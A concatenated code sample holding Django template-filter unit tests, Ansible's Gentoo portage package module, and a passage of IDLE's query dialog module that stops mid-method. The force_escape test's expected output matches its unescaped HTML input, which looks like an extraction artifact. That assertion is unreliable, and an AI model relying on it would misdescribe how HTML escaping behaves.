def test_urlencode(self):
self.assertEqual(urlencode(u'fran\xe7ois & jill'),
u'fran%C3%A7ois%20%26%20jill')
self.assertEqual(urlencode(1), u'1')
def test_iriencode(self):
self.assertEqual(iriencode(u'S\xf8r-Tr\xf8ndelag'),
u'S%C3%B8r-Tr%C3%B8ndelag')
self.assertEqual(iriencode(urlencode(u'fran\xe7ois & jill')),
u'fran%C3%A7ois%20%26%20jill')
def test_urlizetrunc(self):
self.assertEqual(urlizetrunc(u'http://short.com/', 20), u'<a href='\
u'"http://short.com/" rel="nofollow">http://short.com/</a>')
self.assertEqual(urlizetrunc(u'http://www.google.co.uk/search?hl=en'\
u'&q=some+long+url&btnG=Search&meta=', 20), u'<a href="http://'\
u'www.google.co.uk/search?hl=en&q=some+long+url&btnG=Search&'\
u'meta=" rel="nofollow">http://www.google...</a>')
self.assertEqual(urlizetrunc('http://www.google.co.uk/search?hl=en'\
u'&q=some+long+url&btnG=Search&meta=', 20), u'<a href="http://'\
u'www.google.co.uk/search?hl=en&q=some+long+url&btnG=Search'\
u'&meta=" rel="nofollow">http://www.google...</a>')
# Check truncating of URIs which are the exact length
uri = 'http://31characteruri.com/test/'
self.assertEqual(len(uri), 31)
self.assertEqual(urlizetrunc(uri, 31),
u'<a href="http://31characteruri.com/test/" rel="nofollow">'\
u'http://31characteruri.com/test/</a>')
self.assertEqual(urlizetrunc(uri, 30),
u'<a href="http://31characteruri.com/test/" rel="nofollow">'\
u'http://31characteruri.com/t...</a>')
self.assertEqual(urlizetrunc(uri, 2),
u'<a href="http://31characteruri.com/test/"'\
u' rel="nofollow">...</a>')
def test_urlize(self):
# Check normal urlize
self.assertEqual(urlize('http://google.com'),
u'<a href="http://google.com" rel="nofollow">http://google.com</a>')
self.assertEqual(urlize('http://google.com/'),
u'<a href="http://google.com/" rel="nofollow">http://google.com/</a>')
self.assertEqual(urlize('www.google.com'),
u'<a href="http://www.google.com" rel="nofollow">www.google.com</a>')
self.assertEqual(urlize('djangoproject.org'),
u'<a href="http://djangoproject.org" rel="nofollow">djangoproject.org</a>')
self.assertEqual(urlize('info@djangoproject.org'),
u'<a href="mailto:info@djangoproject.org">info@djangoproject.org</a>')
# Check urlize with https addresses
self.assertEqual(urlize('https://google.com'),
u'<a href="https://google.com" rel="nofollow">https://google.com</a>')
def test_wordcount(self):
self.assertEqual(wordcount(''), 0)
self.assertEqual(wordcount(u'oneword'), 1)
self.assertEqual(wordcount(u'lots of words'), 3)
self.assertEqual(wordwrap(u'this is a long paragraph of text that '\
u'really needs to be wrapped I\'m afraid', 14),
u"this is a long\nparagraph of\ntext that\nreally needs\nto be "\
u"wrapped\nI'm afraid")
self.assertEqual(wordwrap(u'this is a short paragraph of text.\n '\
u'But this line should be indented', 14),
u'this is a\nshort\nparagraph of\ntext.\n But this\nline '\
u'should be\nindented')
self.assertEqual(wordwrap(u'this is a short paragraph of text.\n '\
u'But this line should be indented',15), u'this is a short\n'\
u'paragraph of\ntext.\n But this line\nshould be\nindented')
def test_rjust(self):
self.assertEqual(ljust(u'test', 10), u'test ')
self.assertEqual(ljust(u'test', 3), u'test')
self.assertEqual(rjust(u'test', 10), u' test')
self.assertEqual(rjust(u'test', 3), u'test')
def test_center(self):
self.assertEqual(center(u'test', 6), u' test ')
def test_cut(self):
self.assertEqual(cut(u'a string to be mangled', 'a'),
u' string to be mngled')
self.assertEqual(cut(u'a string to be mangled', 'ng'),
u'a stri to be maled')
self.assertEqual(cut(u'a string to be mangled', 'strings'),
u'a string to be mangled')
def test_force_escape(self):
self.assertEqual(
force_escape(u'<some html & special characters > here'),
u'<some html & special characters > here')
self.assertEqual(
force_escape(u'<some html & special characters > here ĐÅ€£'),
u'<some html & special characters > here'\
u' \u0110\xc5\u20ac\xa3')
def test_linebreaks(self):
self.assertEqual(linebreaks(u'line 1'), u'<p>line 1</p>')
self.assertEqual(linebreaks(u'line 1\nline 2'),
u'<p>line 1<br />line 2</p>')
def test_removetags(self):
self.assertEqual(removetags(u'some <b>html</b> with <script>alert'\
u'("You smell")</script> disallowed <img /> tags', 'script img'),
u'some <b>html</b> with alert("You smell") disallowed tags')
self.assertEqual(striptags(u'some <b>html</b> with <script>alert'\
u'("You smell")</script> disallowed <img /> tags'),
u'some html with alert("You smell") disallowed tags')
def test_dictsort(self):
sorted_dicts = dictsort([{'age': 23, 'name': 'Barbara-Ann'},
{'age': 63, 'name': 'Ra Ra Rasputin'},
{'name': 'Jonny B Goode', 'age': 18}], 'age')
self.assertEqual([sorted(dict.items()) for dict in sorted_dicts],
[[('age', 18), ('name', 'Jonny B Goode')],
[('age', 23), ('name', 'Barbara-Ann')],
[('age', 63), ('name', 'Ra Ra Rasputin')]])
def test_dictsortreversed(self):
sorted_dicts = dictsortreversed([{'age': 23, 'name': 'Barbara-Ann'},
{'age': 63, 'name': 'Ra Ra Rasputin'},
{'name': 'Jonny B Goode', 'age': 18}],
'age')
self.assertEqual([sorted(dict.items()) for dict in sorted_dicts],
[[('age', 63), ('name', 'Ra Ra Rasputin')],
[('age', 23), ('name', 'Barbara-Ann')],
[('age', 18), ('name', 'Jonny B Goode')]])
def test_first(self):
self.assertEqual(first([0,1,2]), 0)
self.assertEqual(first(u''), u'')
self.assertEqual(first(u'test'), u't')
def test_join(self):
self.assertEqual(join([0,1,2], u'glue'), u'0glue1glue2')
def test_length(self):
self.assertEqual(length(u'1234'), 4)
self.assertEqual(length([1,2,3,4]), 4)
self.assertEqual(length_is([], 0), True)
self.assertEqual(length_is([], 1), False)
self.assertEqual(length_is('a', 1), True)
self.assertEqual(length_is(u'a', 10), False)
def test_slice(self):
self.assertEqual(slice_(u'abcdefg', u'0'), u'')
self.assertEqual(slice_(u'abcdefg', u'1'), u'a')
self.assertEqual(slice_(u'abcdefg', u'-1'), u'abcdef')
self.assertEqual(slice_(u'abcdefg', u'1:2'), u'b')
self.assertEqual(slice_(u'abcdefg', u'1:3'), u'bc')
self.assertEqual(slice_(u'abcdefg', u'0::2'), u'aceg')
def test_unordered_list(self):
self.assertEqual(unordered_list([u'item 1', u'item 2']),
u'\t<li>item 1</li>\n\t<li>item 2</li>')
self.assertEqual(unordered_list([u'item 1', [u'item 1.1']]),
u'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1</li>\n\t</ul>\n\t</li>')
self.assertEqual(
unordered_list([u'item 1', [u'item 1.1', u'item1.2'], u'item 2']),
u'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1</li>\n\t\t<li>item1.2'\
u'</li>\n\t</ul>\n\t</li>\n\t<li>item 2</li>')
self.assertEqual(
unordered_list([u'item 1', [u'item 1.1', [u'item 1.1.1',
[u'item 1.1.1.1']]]]),
u'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1\n\t\t<ul>\n\t\t\t<li>'\
u'item 1.1.1\n\t\t\t<ul>\n\t\t\t\t<li>item 1.1.1.1</li>\n\t\t\t'\
u'</ul>\n\t\t\t</li>\n\t\t</ul>\n\t\t</li>\n\t</ul>\n\t</li>')
self.assertEqual(unordered_list(
['States', ['Kansas', ['Lawrence', 'Topeka'], 'Illinois']]),
u'\t<li>States\n\t<ul>\n\t\t<li>Kansas\n\t\t<ul>\n\t\t\t<li>'\
u'Lawrence</li>\n\t\t\t<li>Topeka</li>\n\t\t</ul>\n\t\t</li>'\
u'\n\t\t<li>Illinois</li>\n\t</ul>\n\t</li>')
class ULItem(object):
def __init__(self, title):
self.title = title
def __unicode__(self):
return u'ulitem-%s' % str(self.title)
a = ULItem('a')
b = ULItem('b')
self.assertEqual(unordered_list([a,b]),
u'\t<li>ulitem-a</li>\n\t<li>ulitem-b</li>')
# Old format for unordered lists should still work
self.assertEqual(unordered_list([u'item 1', []]), u'\t<li>item 1</li>')
self.assertEqual(unordered_list([u'item 1', [[u'item 1.1', []]]]),
u'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1</li>\n\t</ul>\n\t</li>')
self.assertEqual(unordered_list([u'item 1', [[u'item 1.1', []],
[u'item 1.2', []]]]), u'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1'\
u'</li>\n\t\t<li>item 1.2</li>\n\t</ul>\n\t</li>')
self.assertEqual(unordered_list(['States', [['Kansas', [['Lawrence',
[]], ['Topeka', []]]], ['Illinois', []]]]), u'\t<li>States\n\t'\
u'<ul>\n\t\t<li>Kansas\n\t\t<ul>\n\t\t\t<li>Lawrence</li>'\
u'\n\t\t\t<li>Topeka</li>\n\t\t</ul>\n\t\t</li>\n\t\t<li>'\
u'Illinois</li>\n\t</ul>\n\t</li>')
def test_add(self):
self.assertEqual(add(u'1', u'2'), 3)
def test_get_digit(self):
self.assertEqual(get_digit(123, 1), 3)
self.assertEqual(get_digit(123, 2), 2)
self.assertEqual(get_digit(123, 3), 1)
self.assertEqual(get_digit(123, 4), 0)
self.assertEqual(get_digit(123, 0), 123)
self.assertEqual(get_digit(u'xyz', 0), u'xyz')
def test_date(self):
# real testing of date() is in dateformat.py
self.assertEqual(date(datetime.datetime(2005, 12, 29), u"d F Y"),
u'29 December 2005')
self.assertEqual(date(datetime.datetime(2005, 12, 29), ur'jS o\f F'),
u'29th of December')
def test_time(self):
# real testing of time() is done in dateformat.py
self.assertEqual(time(datetime.time(13), u"h"), u'01')
self.assertEqual(time(datetime.time(0), u"h"), u'12')
def test_timesince(self):
# real testing is done in timesince.py, where we can provide our own 'now'
self.assertEqual(
timesince(datetime.datetime.now() - datetime.timedelta(1)),
u'1 day')
self.assertEqual(
timesince(datetime.datetime(2005, 12, 29),
datetime.datetime(2005, 12, 30)),
u'1 day')
def test_timeuntil(self):
self.assertEqual(
timeuntil(datetime.datetime.now() + datetime.timedelta(1)),
u'1 day')
self.assertEqual(timeuntil(datetime.datetime(2005, 12, 30),
datetime.datetime(2005, 12, 29)),
u'1 day')
def test_default(self):
self.assertEqual(default(u"val", u"default"), u'val')
self.assertEqual(default(None, u"default"), u'default')
self.assertEqual(default(u'', u"default"), u'default')
def test_if_none(self):
self.assertEqual(default_if_none(u"val", u"default"), u'val')
self.assertEqual(default_if_none(None, u"default"), u'default')
self.assertEqual(default_if_none(u'', u"default"), u'')
def test_divisibleby(self):
self.assertEqual(divisibleby(4, 2), True)
self.assertEqual(divisibleby(4, 3), False)
def test_yesno(self):
self.assertEqual(yesno(True), u'yes')
self.assertEqual(yesno(False), u'no')
self.assertEqual(yesno(None), u'maybe')
self.assertEqual(yesno(True, u'certainly,get out of town,perhaps'),
u'certainly')
self.assertEqual(yesno(False, u'certainly,get out of town,perhaps'),
u'get out of town')
self.assertEqual(yesno(None, u'certainly,get out of town,perhaps'),
u'perhaps')
self.assertEqual(yesno(None, u'certainly,get out of town'),
u'get out of town')
def test_filesizeformat(self):
self.assertEqual(filesizeformat(1023), u'1023 bytes')
self.assertEqual(filesizeformat(1024), u'1.0 KB')
self.assertEqual(filesizeformat(10*1024), u'10.0 KB')
self.assertEqual(filesizeformat(1024*1024-1), u'1024.0 KB')
self.assertEqual(filesizeformat(1024*1024), u'1.0 MB')
self.assertEqual(filesizeformat(1024*1024*50), u'50.0 MB')
self.assertEqual(filesizeformat(1024*1024*1024-1), u'1024.0 MB')
self.assertEqual(filesizeformat(1024*1024*1024), u'1.0 GB')
self.assertEqual(filesizeformat(1024*1024*1024*1024), u'1.0 TB')
self.assertEqual(filesizeformat(1024*1024*1024*1024*1024), u'1.0 PB')
self.assertEqual(filesizeformat(1024*1024*1024*1024*1024*2000),
u'2000.0 PB')
self.assertEqual(filesizeformat(complex(1,-1)), u'0 bytes')
self.assertEqual(filesizeformat(""), u'0 bytes')
self.assertEqual(filesizeformat(u"\N{GREEK SMALL LETTER ALPHA}"),
u'0 bytes')
def test_localized_filesizeformat(self):
from django.utils.translation import activate, deactivate
old_localize = settings.USE_L10N
try:
activate('de')
settings.USE_L10N = True
self.assertEqual(filesizeformat(1023), u'1023 Bytes')
self.assertEqual(filesizeformat(1024), u'1,0 KB')
self.assertEqual(filesizeformat(10*1024), u'10,0 KB')
self.assertEqual(filesizeformat(1024*1024-1), u'1024,0 KB')
self.assertEqual(filesizeformat(1024*1024), u'1,0 MB')
self.assertEqual(filesizeformat(1024*1024*50), u'50,0 MB')
self.assertEqual(filesizeformat(1024*1024*1024-1), u'1024,0 MB')
self.assertEqual(filesizeformat(1024*1024*1024), u'1,0 GB')
self.assertEqual(filesizeformat(1024*1024*1024*1024), u'1,0 TB')
self.assertEqual(filesizeformat(1024*1024*1024*1024*1024),
u'1,0 PB')
self.assertEqual(filesizeformat(1024*1024*1024*1024*1024*2000),
u'2000,0 PB')
self.assertEqual(filesizeformat(complex(1,-1)), u'0 Bytes')
self.assertEqual(filesizeformat(""), u'0 Bytes')
self.assertEqual(filesizeformat(u"\N{GREEK SMALL LETTER ALPHA}"),
u'0 Bytes')
finally:
deactivate()
settings.USE_L10N = old_localize
def test_pluralize(self):
self.assertEqual(pluralize(1), u'')
self.assertEqual(pluralize(0), u's')
self.assertEqual(pluralize(2), u's')
self.assertEqual(pluralize([1]), u'')
self.assertEqual(pluralize([]), u's')
self.assertEqual(pluralize([1,2,3]), u's')
self.assertEqual(pluralize(1,u'es'), u'')
self.assertEqual(pluralize(0,u'es'), u'es')
self.assertEqual(pluralize(2,u'es'), u'es')
self.assertEqual(pluralize(1,u'y,ies'), u'y')
self.assertEqual(pluralize(0,u'y,ies'), u'ies')
self.assertEqual(pluralize(2,u'y,ies'), u'ies')
self.assertEqual(pluralize(0,u'y,ies,error'), u'')
def test_phone2numeric(self):
self.assertEqual(phone2numeric(u'0800 flowers'), u'0800 3569377')
def test_non_string_input(self):
# Filters shouldn't break if passed non-strings
self.assertEqual(addslashes(123), u'123')
self.assertEqual(linenumbers(123), u'1. 123')
self.assertEqual(lower(123), u'123')
self.assertEqual(make_list(123), [u'1', u'2', u'3'])
self.assertEqual(slugify(123), u'123')
self.assertEqual(title(123), u'123')
self.assertEqual(truncatewords(123, 2), u'123')
self.assertEqual(upper(123), u'123')
self.assertEqual(urlencode(123), u'123')
self.assertEqual(urlize(123), u'123')
self.assertEqual(urlizetrunc(123, 1), u'123')
self.assertEqual(wordcount(123), 1)
self.assertEqual(wordwrap(123, 2), u'123')
self.assertEqual(ljust('123', 4), u'123 ')
self.assertEqual(rjust('123', 4), u' 123')
self.assertEqual(center('123', 5), u' 123 ')
self.assertEqual(center('123', 6), u' 123 ')
self.assertEqual(cut(123, '2'), u'13')
self.assertEqual(escape(123), u'123')
self.assertEqual(linebreaks(123), u'<p>123</p>')
self.assertEqual(linebreaksbr(123), u'123')
self.assertEqual(removetags(123, 'a'), u'123')
self.assertEqual(striptags(123), u'123')
| bsd-3-clause |
tszym/ansible | lib/ansible/modules/packaging/os/portage.py | 7 | 13976 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2016, William L Thomson Jr
# (c) 2013, Yap Sok Ann
# Written by Yap Sok Ann <sokann@gmail.com>
# Modified by William L. Thomson Jr. <wlt@o-sinc.com>
# Based on apt module written by Matthew Williams <matthew@flowroute.com>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: portage
short_description: Package manager for Gentoo
description:
- Manages Gentoo packages
version_added: "1.6"
options:
package:
description:
- Package atom or set, e.g. C(sys-apps/foo) or C(>foo-2.13) or C(@world)
required: false
default: null
state:
description:
- State of the package atom
required: false
default: "present"
choices: [ "present", "installed", "emerged", "absent", "removed", "unmerged", "latest" ]
update:
description:
- Update packages to the best version available (--update)
required: false
default: no
choices: [ "yes", "no" ]
deep:
description:
- Consider the entire dependency tree of packages (--deep)
required: false
default: no
choices: [ "yes", "no" ]
newuse:
description:
- Include installed packages where USE flags have changed (--newuse)
required: false
default: no
choices: [ "yes", "no" ]
changed_use:
description:
- Include installed packages where USE flags have changed, except when
- flags that the user has not enabled are added or removed
- (--changed-use)
required: false
default: no
choices: [ "yes", "no" ]
version_added: 1.8
oneshot:
description:
- Do not add the packages to the world file (--oneshot)
required: false
default: False
choices: [ "yes", "no" ]
noreplace:
description:
- Do not re-emerge installed packages (--noreplace)
required: false
default: False
choices: [ "yes", "no" ]
nodeps:
description:
- Only merge packages but not their dependencies (--nodeps)
required: false
default: False
choices: [ "yes", "no" ]
onlydeps:
description:
- Only merge packages' dependencies but not the packages (--onlydeps)
required: false
default: False
choices: [ "yes", "no" ]
depclean:
description:
- Remove packages not needed by explicitly merged packages (--depclean)
- If no package is specified, clean up the world's dependencies
- Otherwise, --depclean serves as a dependency aware version of --unmerge
required: false
default: False
choices: [ "yes", "no" ]
quiet:
description:
- Run emerge in quiet mode (--quiet)
required: false
default: False
choices: [ "yes", "no" ]
verbose:
description:
- Run emerge in verbose mode (--verbose)
required: false
default: False
choices: [ "yes", "no" ]
sync:
description:
- Sync package repositories first
- If yes, perform "emerge --sync"
- If web, perform "emerge-webrsync"
required: false
default: null
choices: [ "web", "yes", "no" ]
getbinpkg:
description:
- Prefer packages specified at PORTAGE_BINHOST in make.conf
required: false
default: False
choices: [ "yes", "no" ]
usepkgonly:
description:
- Merge only binaries (no compiling). This sets getbinpkg=yes.
required: false
default: False
choices: [ "yes", "no" ]
keepgoing:
description:
- Continue as much as possible after an error.
required: false
default: False
choices: [ "yes", "no" ]
version_added: 2.3
jobs:
description:
- Specifies the number of packages to build simultaneously.
required: false
default: None
version_added: 2.3
loadavg:
description:
- Specifies that no new builds should be started if there are
- other builds running and the load average is at least LOAD
required: false
default: None
version_added: 2.3
requirements: [ gentoolkit ]
author:
- "William L Thomson Jr (@wltjr)"
- "Yap Sok Ann (@sayap)"
- "Andrew Udvare"
notes: []
'''
EXAMPLES = '''
# Make sure package foo is installed
- portage:
package: foo
state: present
# Make sure package foo is not installed
- portage:
package: foo
state: absent
# Update package foo to the "latest" version ( os specific alternative to latest )
- portage:
package: foo
update: yes
# Install package foo using PORTAGE_BINHOST setup
- portage:
package: foo
getbinpkg: yes
# Re-install world from binary packages only and do not allow any compiling
- portage:
package: '@world'
usepkgonly: yes
# Sync repositories and update world
- portage:
package: '@world'
update: yes
deep: yes
sync: yes
# Remove unneeded packages
- portage:
depclean: yes
# Remove package foo if it is not explicitly needed
- portage:
package: foo
state: absent
depclean: yes
'''
import os
import pipes
import re
def query_package(module, package, action):
if package.startswith('@'):
return query_set(module, package, action)
return query_atom(module, package, action)
def query_atom(module, atom, action):
cmd = '%s list %s' % (module.equery_path, atom)
rc, out, err = module.run_command(cmd)
return rc == 0
def query_set(module, set, action):
system_sets = [
'@live-rebuild',
'@module-rebuild',
'@preserved-rebuild',
'@security',
'@selected',
'@system',
'@world',
'@x11-module-rebuild',
]
if set in system_sets:
if action == 'unmerge':
module.fail_json(msg='set %s cannot be removed' % set)
return False
world_sets_path = '/var/lib/portage/world_sets'
if not os.path.exists(world_sets_path):
return False
cmd = 'grep %s %s' % (set, world_sets_path)
rc, out, err = module.run_command(cmd)
return rc == 0
def sync_repositories(module, webrsync=False):
if module.check_mode:
module.exit_json(msg='check mode not supported by sync')
if webrsync:
webrsync_path = module.get_bin_path('emerge-webrsync', required=True)
cmd = '%s --quiet' % webrsync_path
else:
cmd = '%s --sync --quiet --ask=n' % module.emerge_path
rc, out, err = module.run_command(cmd)
if rc != 0:
module.fail_json(msg='could not sync package repositories')
# Note: In the 3 functions below, equery is done one-by-one, but emerge is done
# in one go. If that is not desirable, split the packages into multiple tasks
# instead of joining them together with comma.
def emerge_packages(module, packages):
p = module.params
if not (p['update'] or p['noreplace'] or p['state']=='latest'):
for package in packages:
if not query_package(module, package, 'emerge'):
break
else:
module.exit_json(changed=False, msg='Packages already present.')
if module.check_mode:
module.exit_json(changed=True, msg='Packages would be installed.')
args = []
emerge_flags = {
'update': '--update',
'deep': '--deep',
'newuse': '--newuse',
'changed_use': '--changed-use',
'oneshot': '--oneshot',
'noreplace': '--noreplace',
'nodeps': '--nodeps',
'onlydeps': '--onlydeps',
'quiet': '--quiet',
'verbose': '--verbose',
'getbinpkg': '--getbinpkg',
'usepkgonly': '--usepkgonly',
'usepkg': '--usepkg',
'keepgoing': '--keep-going',
}
for flag, arg in emerge_flags.items():
if p[flag]:
args.append(arg)
if p['state'] and p['state']=='latest':
args.append("--update")
if p['usepkg'] and p['usepkgonly']:
module.fail_json(msg='Use only one of usepkg, usepkgonly')
emerge_flags = {
'jobs': '--jobs=',
'loadavg': '--load-average ',
}
for flag, arg in emerge_flags.items():
if p[flag] is not None:
args.append(arg + str(p[flag]))
cmd, (rc, out, err) = run_emerge(module, packages, *args)
if rc != 0:
module.fail_json(
cmd=cmd, rc=rc, stdout=out, stderr=err,
msg='Packages not installed.',
)
# Check for SSH error with PORTAGE_BINHOST, since rc is still 0 despite
# this error
if (p['usepkgonly'] or p['getbinpkg']) \
and 'Permission denied (publickey).' in err:
module.fail_json(
cmd=cmd, rc=rc, stdout=out, stderr=err,
msg='Please check your PORTAGE_BINHOST configuration in make.conf '
'and your SSH authorized_keys file',
)
changed = True
for line in out.splitlines():
if re.match(r'(?:>+) Emerging (?:binary )?\(1 of', line):
msg = 'Packages installed.'
break
elif module.check_mode and re.match(r'\[(binary|ebuild)', line):
msg = 'Packages would be installed.'
break
else:
changed = False
msg = 'No packages installed.'
module.exit_json(
changed=changed, cmd=cmd, rc=rc, stdout=out, stderr=err,
msg=msg,
)
def unmerge_packages(module, packages):
p = module.params
for package in packages:
if query_package(module, package, 'unmerge'):
break
else:
module.exit_json(changed=False, msg='Packages already absent.')
args = ['--unmerge']
for flag in ['quiet', 'verbose']:
if p[flag]:
args.append('--%s' % flag)
cmd, (rc, out, err) = run_emerge(module, packages, *args)
if rc != 0:
module.fail_json(
cmd=cmd, rc=rc, stdout=out, stderr=err,
msg='Packages not removed.',
)
module.exit_json(
changed=True, cmd=cmd, rc=rc, stdout=out, stderr=err,
msg='Packages removed.',
)
def cleanup_packages(module, packages):
p = module.params
if packages:
for package in packages:
if query_package(module, package, 'unmerge'):
break
else:
module.exit_json(changed=False, msg='Packages already absent.')
args = ['--depclean']
for flag in ['quiet', 'verbose']:
if p[flag]:
args.append('--%s' % flag)
cmd, (rc, out, err) = run_emerge(module, packages, *args)
if rc != 0:
module.fail_json(cmd=cmd, rc=rc, stdout=out, stderr=err)
removed = 0
for line in out.splitlines():
if not line.startswith('Number removed:'):
continue
parts = line.split(':')
removed = int(parts[1].strip())
changed = removed > 0
module.exit_json(
changed=changed, cmd=cmd, rc=rc, stdout=out, stderr=err,
msg='Depclean completed.',
)
def run_emerge(module, packages, *args):
args = list(args)
args.append('--ask=n')
if module.check_mode:
args.append('--pretend')
cmd = [module.emerge_path] + args + packages
return cmd, module.run_command(cmd)
portage_present_states = ['present', 'emerged', 'installed', 'latest']
portage_absent_states = ['absent', 'unmerged', 'removed']
def main():
module = AnsibleModule(
argument_spec=dict(
package=dict(default=None, aliases=['name'], type='list'),
state=dict(
default=portage_present_states[0],
choices=portage_present_states + portage_absent_states,
),
update=dict(default=False, type='bool'),
deep=dict(default=False, type='bool'),
newuse=dict(default=False, type='bool'),
changed_use=dict(default=False, type='bool'),
oneshot=dict(default=False, type='bool'),
noreplace=dict(default=False, type='bool'),
nodeps=dict(default=False, type='bool'),
onlydeps=dict(default=False, type='bool'),
depclean=dict(default=False, type='bool'),
quiet=dict(default=False, type='bool'),
verbose=dict(default=False, type='bool'),
sync=dict(default=None, choices=['yes', 'web', 'no']),
getbinpkg=dict(default=False, type='bool'),
usepkgonly=dict(default=False, type='bool'),
usepkg=dict(default=False, type='bool'),
keepgoing=dict(default=False, type='bool'),
jobs=dict(default=None, type='int'),
loadavg=dict(default=None, type='float'),
),
required_one_of=[['package', 'sync', 'depclean']],
mutually_exclusive=[['nodeps', 'onlydeps'], ['quiet', 'verbose']],
supports_check_mode=True,
)
module.emerge_path = module.get_bin_path('emerge', required=True)
module.equery_path = module.get_bin_path('equery', required=True)
p = module.params
if p['sync'] and p['sync'].strip() != 'no':
sync_repositories(module, webrsync=(p['sync'] == 'web'))
if not p['package']:
module.exit_json(msg='Sync successfully finished.')
packages = []
if p['package']:
packages.extend(p['package'])
if p['depclean']:
if packages and p['state'] not in portage_absent_states:
module.fail_json(
msg='Depclean can only be used with package when the state is '
'one of: %s' % portage_absent_states,
)
cleanup_packages(module, packages)
elif p['state'] in portage_present_states:
emerge_packages(module, packages)
elif p['state'] in portage_absent_states:
unmerge_packages(module, packages)
# import module snippets
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
| gpl-3.0 |
Microsoft/PTVS | Python/Product/Miniconda/Miniconda3-x64/Lib/idlelib/query.py | 3 | 12355 | """
Dialogs that query users and verify the answer before accepting.
Use ttk widgets, limiting use to tcl/tk 8.5+, as in IDLE 3.6+.
Query is the generic base class for a popup dialog.
The user must either enter a valid answer or close the dialog.
Entries are validated when <Return> is entered or [Ok] is clicked.
Entries are ignored when [Cancel] or [X] are clicked.
The 'return value' is .result set to either a valid answer or None.
Subclass SectionName gets a name for a new config file section.
Configdialog uses it for new highlight theme and keybinding set names.
Subclass ModuleName gets a name for File => Open Module.
Subclass HelpSource gets menu item and path for additions to Help menu.
"""
# Query and Section name result from splitting GetCfgSectionNameDialog
# of configSectionNameDialog.py (temporarily config_sec.py) into
# generic and specific parts. 3.6 only, July 2016.
# ModuleName.entry_ok came from editor.EditorWindow.load_module.
# HelpSource was extracted from configHelpSourceEdit.py (temporarily
# config_help.py), with darwin code moved from ok to path_ok.
import importlib
import os
from sys import executable, platform # Platform is set for one test.
from tkinter import Toplevel, StringVar, W, E, S
from tkinter.ttk import Frame, Button, Entry, Label
from tkinter import filedialog
from tkinter.font import Font
class Query(Toplevel):
"""Base class for getting verified answer from a user.
For this base class, accept any non-blank string.
"""
def __init__(self, parent, title, message, *, text0='', used_names={},
_htest=False, _utest=False):
"""Create popup, do not return until tk widget destroyed.
Additional subclass init must be done before calling this
unless _utest=True is passed to suppress wait_window().
title - string, title of popup dialog
message - string, informational message to display
text0 - initial value for entry
used_names - names already in use
_htest - bool, change box location when running htest
_utest - bool, leave window hidden and not modal
"""
Toplevel.__init__(self, parent)
self.withdraw() # Hide while configuring, especially geometry.
self.parent = parent
self.title(title)
self.message = message
self.text0 = text0
self.used_names = used_names
self.transient(parent)
self.grab_set()
windowingsystem = self.tk.call('tk', 'windowingsystem')
if windowingsystem == 'aqua':
try:
self.tk.call('::tk::unsupported::MacWindowStyle', 'style',
self._w, 'moveableModal', '')
except:
pass
self.bind("<Command-.>", self.cancel)
self.bind('<Key-Escape>', self.cancel)
self.protocol("WM_DELETE_WINDOW", self.cancel)
self.bind('<Key-Return>', self.ok)
self.bind("<KP_Enter>", self.ok)
self.resizable(height=False, width=False)
self.create_widgets()
self.update_idletasks() # Needed here for winfo_reqwidth below.
self.geometry( # Center dialog over parent (or below htest box).
"+%d+%d" % (
parent.winfo_rootx() +
(parent.winfo_width()/2 - self.winfo_reqwidth()/2),
parent.winfo_rooty() +
((parent.winfo_height()/2 - self.winfo_reqheight()/2)
if not _htest else 150)
) )
if not _utest:
self.deiconify() # Unhide now that geometry set.
self.wait_window()
def create_widgets(self): # Call from override, if any.
# Bind to self widgets needed for entry_ok or unittest.
self.frame = frame = Frame(self, padding=10)
frame.grid(column=0, row=0, sticky='news')
frame.grid_columnconfigure(0, weight=1)
entrylabel = Label(frame, anchor='w', justify='left',
text=self.message)
self.entryvar = StringVar(self, self.text0)
self.entry = Entry(frame, width=30, textvariable=self.entryvar)
self.entry.focus_set()
self.error_font = Font(name='TkCaptionFont',
exists=True, root=self.parent)
self.entry_error = Label(frame, text=' ', foreground='red',
font=self.error_font)
self.button_ok = Button(
frame, text='OK', default='active', command=self.ok)
self.button_cancel = Button(
frame, text='Cancel', command=self.cancel)
entrylabel.grid(column=0, row=0, columnspan=3, padx=5, sticky=W)
self.entry.grid(column=0, row=1, columnspan=3, padx=5, sticky=W+E,
pady=[10,0])
self.entry_error.grid(column=0, row=2, columnspan=3, padx=5,
sticky=W+E)
self.button_ok.grid(column=1, row=99, padx=5)
self.button_cancel.grid(column=2, row=99, padx=5)
def showerror(self, message, widget=None):
#self.bell(displayof=self)
(widget or self.entry_error)['text'] = 'ERROR: ' + message
def entry_ok(self): # Example: usually replace.
"Return non-blank entry or None."
self.entry_error['text'] = ''
entry = self.entry.get().strip()
if not entry:
self.showerror('blank line.')
return None
return entry
def ok(self, event=None): # Do not replace.
'''If entry is valid, bind it to 'result' and destroy tk widget.
Otherwise leave dialog open for user to correct entry or cancel.
'''
entry = self.entry_ok()
if entry is not None:
self.result = entry
self.destroy()
else:
# [Ok] moves focus. (<Return> does not.) Move it back.
self.entry.focus_set()
def cancel(self, event=None): # Do not replace.
"Set dialog result to None and destroy tk widget."
self.result = None
self.destroy()
class SectionName(Query):
"Get a name for a config file section name."
# Used in ConfigDialog.GetNewKeysName, .GetNewThemeName (837)
def __init__(self, parent, title, message, used_names,
*, _htest=False, _utest=False):
super().__init__(parent, title, message, used_names=used_names,
_htest=_htest, _utest=_utest)
def entry_ok(self):
"Return sensible ConfigParser section name or None."
self.entry_error['text'] = ''
name = self.entry.get().strip()
if not name:
self.showerror('no name specified.')
return None
elif len(name)>30:
self.showerror('name is longer than 30 characters.')
return None
elif name in self.used_names:
self.showerror('name is already in use.')
return None
return name
class ModuleName(Query):
"Get a module name for Open Module menu entry."
# Used in open_module (editor.EditorWindow until move to iobinding).
def __init__(self, parent, title, message, text0,
*, _htest=False, _utest=False):
super().__init__(parent, title, message, text0=text0,
_htest=_htest, _utest=_utest)
def entry_ok(self):
"Return entered module name as file path or None."
self.entry_error['text'] = ''
